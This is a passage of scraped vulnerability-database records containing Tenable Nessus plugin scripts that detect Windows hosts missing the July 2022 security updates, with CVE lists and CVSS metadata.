Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163052);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n 
\"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015808\");\n script_xref(name:\"MSFT\", value:\"MS22-5015808\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015808: Windows 10 Version 1607 and Windows Server 2016 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015808.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-22025,\n CVE-2022-22040, CVE-2022-22043, CVE-2022-30208)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21845, CVE-2022-22028,\n CVE-2022-22042, CVE-2022-22711, CVE-2022-30213,\n CVE-2022-30223)\n\nNote that Nessus has not tested for these issues but has instead \nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015808\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015808\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015808\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:34", "description": "The remote Windows host is missing security update 5015814. It is, therefore, affected by multiple vulnerabilities:\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-22024, CVE-2022-22027, CVE-2022-22038, CVE-2022-30211, CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015814: Windows 11 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015814.NASL", "href": "https://www.tenable.com/plugins/nessus/163041", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163041);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n 
\"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015814\");\n script_xref(name:\"MSFT\", value:\"MS22-5015814\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015814: Windows 11 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015814. It is, therefore, affected by multiple vulnerabilities:\n \n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30220, CVE-2022-30224, CVE-2022-30225,\n CVE-2022-30226)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22038, CVE-2022-30211,\n CVE-2022-30221, CVE-2022-30222)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015814\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015814\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015814\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015814'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015814])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:22", "description": "The remote Windows host is missing security update 5015811.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015811: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015811.NASL", "href": "https://www.tenable.com/plugins/nessus/163046", "sourceData": "##\n# (C) Tenable, 
Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163046);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015811\");\n script_xref(name:\"MSFT\", value:\"MS22-5015811\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015811: Windows 10 version 1809 / Windows Server 2019 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015811.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30214,\n CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031,\n CVE-2022-22034, CVE-2022-22036, CVE-2022-22037,\n CVE-2022-22041, CVE-2022-22045, CVE-2022-22047,\n CVE-2022-22049, CVE-2022-22050, CVE-2022-30202,\n CVE-2022-30205, CVE-2022-30206, CVE-2022-30209,\n CVE-2022-30215, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015811\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015811\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015811\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30215\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015811'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015811])\n)\n{\n 
replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015807. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015807: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-27776", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30212", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30216", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226", "CVE-2022-33644"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015807.NASL", "href": "https://www.tenable.com/plugins/nessus/163048", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163048);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-27776\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30212\",\n \"CVE-2022-30213\",\n \"CVE-2022-30214\",\n \"CVE-2022-30215\",\n \"CVE-2022-30216\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30222\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\",\n \"CVE-2022-33644\"\n );\n script_xref(name:\"MSKB\", value:\"5015807\");\n script_xref(name:\"MSFT\", value:\"MS22-5015807\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015807: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (July 2022)\");\n\n 